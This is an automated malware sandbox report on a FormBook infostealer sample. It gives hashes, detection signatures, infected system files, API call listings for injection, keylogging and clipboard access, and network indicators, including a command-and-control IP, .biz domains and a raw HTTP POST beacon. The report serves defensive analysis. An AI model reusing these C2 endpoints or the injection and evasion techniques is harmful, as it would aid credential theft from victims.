Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
UaOJAOMxcU.exe

Overview

General Information

Sample name:UaOJAOMxcU.exe
renamed because original name is a hash value
Original sample name:2a60ca525c89948993b31e2e086a88455e71363863cfc7f835a47c1b657ea4a5.exe
Analysis ID:1588231
MD5:97a3cc0911d35ed963283afb08b1e671
SHA1:129e91e7dbf157743c1ddcc332f3880e99427115
SHA256:2a60ca525c89948993b31e2e086a88455e71363863cfc7f835a47c1b657ea4a5
Tags:exeWormm0yvuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops executable to a common third party application directory
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • UaOJAOMxcU.exe (PID: 5036 cmdline: "C:\Users\user\Desktop\UaOJAOMxcU.exe" MD5: 97A3CC0911D35ED963283AFB08B1E671)
    • svchost.exe (PID: 6508 cmdline: "C:\Users\user\Desktop\UaOJAOMxcU.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • armsvc.exe (PID: 6468 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 717063427E4960E26A9AEEA93FFA8BC8)
  • alg.exe (PID: 6972 cmdline: C:\Windows\System32\alg.exe MD5: 791FE83149B027ED288BF7B3D73209AA)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.2399922107.0000000003190000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.2399407807.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        3.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Uncommon Svchost Parent Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\UaOJAOMxcU.exe", CommandLine: "C:\Users\user\Desktop\UaOJAOMxcU.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\UaOJAOMxcU.exe", ParentImage: C:\Users\user\Desktop\UaOJAOMxcU.exe, ParentProcessId: 5036, ParentProcessName: UaOJAOMxcU.exe, ProcessCommandLine: "C:\Users\user\Desktop\UaOJAOMxcU.exe", ProcessId: 6508, ProcessName: svchost.exe
          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\UaOJAOMxcU.exe", CommandLine: "C:\Users\user\Desktop\UaOJAOMxcU.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\UaOJAOMxcU.exe", ParentImage: C:\Users\user\Desktop\UaOJAOMxcU.exe, ParentProcessId: 5036, ParentProcessName: UaOJAOMxcU.exe, ProcessCommandLine: "C:\Users\user\Desktop\UaOJAOMxcU.exe", ProcessId: 6508, ProcessName: svchost.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-10T22:55:57.680935+010020181411A Network Trojan was detected54.244.188.17780192.168.2.549704TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-10T22:55:57.680935+010020377711A Network Trojan was detected54.244.188.17780192.168.2.549704TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-10T22:55:57.553921+010028508511Malware Command and Control Activity Detected192.168.2.54970454.244.188.17780TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: UaOJAOMxcU.exeAvira: detected
          Antivirus detection for URL or domain
          Source: http://54.244.188.177/Avira URL Cloud: Label: malware
          Source: http://54.244.188.177/rhimsalyAvira URL Cloud: Label: malware
          Source: http://54.244.188.177/rhimsalyUSAvira URL Cloud: Label: malware
          Source: http://54.244.188.177/2Avira URL Cloud: Label: malware
          Antivirus detection for dropped file
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\AppVClient.exeAvira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\alg.exeAvira: detection malicious, Label: W32/Infector.Gen
          Multi AV Scanner detection for submitted file
          Source: UaOJAOMxcU.exeVirustotal: Detection: 78%Perma Link
          Source: UaOJAOMxcU.exeReversingLabs: Detection: 95%
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.2399922107.0000000003190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.2399407807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for dropped file
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
          Source: C:\Windows\System32\AppVClient.exeJoe Sandbox ML: detected
          Source: C:\Windows\System32\alg.exeJoe Sandbox ML: detected
          Machine Learning detection for sample
          Source: UaOJAOMxcU.exeJoe Sandbox ML: detected
          Source: UaOJAOMxcU.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: UaOJAOMxcU.exe, 00000000.00000003.2041180877.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
          Source: Binary string: AppVClient.pdbGCTL source: AppVClient.exe.0.dr
          Source: Binary string: ALG.pdbGCTL source: UaOJAOMxcU.exe, 00000000.00000003.2046467413.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
          Source: Binary string: AppVClient.pdb source: AppVClient.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: UaOJAOMxcU.exe, 00000000.00000003.2052793955.0000000004240000.00000004.00001000.00020000.00000000.sdmp, UaOJAOMxcU.exe, 00000000.00000003.2050079524.0000000004230000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2367722513.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2366014317.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2399968118.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2399968118.000000000359E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: UaOJAOMxcU.exe, 00000000.00000003.2052793955.0000000004240000.00000004.00001000.00020000.00000000.sdmp, UaOJAOMxcU.exe, 00000000.00000003.2050079524.0000000004230000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000003.2367722513.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2366014317.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2399968118.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2399968118.000000000359E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: ALG.pdb source: UaOJAOMxcU.exe, 00000000.00000003.2046467413.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr

          Spreading

          barindex
          Infects executable files (exe, dll, sys, html)
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0046445A
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0046C6D1 FindFirstFileW,FindClose,0_2_0046C6D1
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0046C75C
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046EF95
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F0F2
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046F3F3
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004637EF
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463B12
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046BCBC

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.5:49704 -> 54.244.188.177:80
          Source: Joe Sandbox ViewIP Address: 54.244.188.177 54.244.188.177
          Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.5:49704
          Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.5:49704
          Source: global trafficHTTP traffic detected: POST /rhimsaly HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 804
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_004722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_004722EE
          Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
          Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
          Source: unknownHTTP traffic detected: POST /rhimsaly HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 804
          Source: UaOJAOMxcU.exe, 00000000.00000002.2062897697.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, UaOJAOMxcU.exe, 00000000.00000002.2062179176.0000000000C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/
          Source: UaOJAOMxcU.exe, 00000000.00000002.2062179176.0000000000C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/2
          Source: UaOJAOMxcU.exe, 00000000.00000002.2062179176.0000000000C1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/rhimsaly
          Source: UaOJAOMxcU.exe, 00000000.00000002.2062179176.0000000000BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/rhimsalyUS
          Source: UaOJAOMxcU.exe, 00000000.00000002.2062179176.0000000000B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pywolwnvd.biz/
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00474164
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00474164
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00473F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00473F66
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0046001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0046001C
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0048CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0048CABC

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.2399922107.0000000003190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.2399407807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Binary is likely a compiled AutoIt script file
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: This is a third-party compiled AutoIt script.0_2_00403B3A
          Source: UaOJAOMxcU.exeString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: UaOJAOMxcU.exe, 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_aca67744-a
          Source: UaOJAOMxcU.exe, 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_341c3ddf-f
          Source: UaOJAOMxcU.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_08ed7085-2
          Source: UaOJAOMxcU.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_49b8090b-5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0042CBC3 NtClose,3_2_0042CBC3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472B60 NtClose,LdrInitializeThunk,3_2_03472B60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_03472DF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034735C0 NtCreateMutant,LdrInitializeThunk,3_2_034735C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03474340 NtSetContextThread,3_2_03474340
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03474650 NtSuspendThread,3_2_03474650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472BE0 NtQueryValueKey,3_2_03472BE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472BF0 NtAllocateVirtualMemory,3_2_03472BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472B80 NtQueryInformationFile,3_2_03472B80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472BA0 NtEnumerateValueKey,3_2_03472BA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472AD0 NtReadFile,3_2_03472AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472AF0 NtWriteFile,3_2_03472AF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472AB0 NtWaitForSingleObject,3_2_03472AB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472F60 NtCreateProcessEx,3_2_03472F60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472F30 NtCreateSection,3_2_03472F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472FE0 NtCreateFile,3_2_03472FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472F90 NtProtectVirtualMemory,3_2_03472F90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472FA0 NtQuerySection,3_2_03472FA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472FB0 NtResumeThread,3_2_03472FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472E30 NtWriteVirtualMemory,3_2_03472E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472EE0 NtQueueApcThread,3_2_03472EE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472E80 NtReadVirtualMemory,3_2_03472E80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472EA0 NtAdjustPrivilegesToken,3_2_03472EA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472D00 NtSetInformationFile,3_2_03472D00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472D10 NtMapViewOfSection,3_2_03472D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472D30 NtUnmapViewOfSection,3_2_03472D30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472DD0 NtDelayExecution,3_2_03472DD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472DB0 NtEnumerateKey,3_2_03472DB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472C60 NtCreateKey,3_2_03472C60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472C70 NtFreeVirtualMemory,3_2_03472C70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472C00 NtQueryInformationProcess,3_2_03472C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472CC0 NtQueryVirtualMemory,3_2_03472CC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472CF0 NtOpenProcess,3_2_03472CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03472CA0 NtQueryInformationToken,3_2_03472CA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03473010 NtOpenDirectoryObject,3_2_03473010
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03473090 NtSetValueKey,3_2_03473090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034739B0 NtGetContextThread,3_2_034739B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03473D70 NtOpenThread,3_2_03473D70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03473D10 NtOpenProcessToken,3_2_03473D10
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0046A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0046A1EF
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00458310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00458310
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_004651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_004651BD
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0040E6A00_2_0040E6A0
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0042D9750_2_0042D975
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0040FCE00_2_0040FCE0
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_004221C50_2_004221C5
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_004362D20_2_004362D2
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_004803DA0_2_004803DA
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0043242E0_2_0043242E
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_004225FA0_2_004225FA
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0045E6160_2_0045E616
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_004166E10_2_004166E1
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0043878F0_2_0043878F
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_004368440_2_00436844
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_004808570_2_00480857
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_004188080_2_00418808
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_004688890_2_00468889
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0042CB210_2_0042CB21
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00436DB60_2_00436DB6
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00416F9E0_2_00416F9E
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_004130300_2_00413030
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0042F1D90_2_0042F1D9
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_004231870_2_00423187
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_004012870_2_00401287
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_004214840_2_00421484
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_004155200_2_00415520
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_004276960_2_00427696
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_004157600_2_00415760
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_004219780_2_00421978
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00439AB50_2_00439AB5
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00523CC80_2_00523CC8
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00487DDB0_2_00487DDB
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_00421D900_2_00421D90
          Source: C:\Users\user\Desktop\UaOJAOMxcU.exeCode function: 0_2_0042BDA60_2_0042BDA6
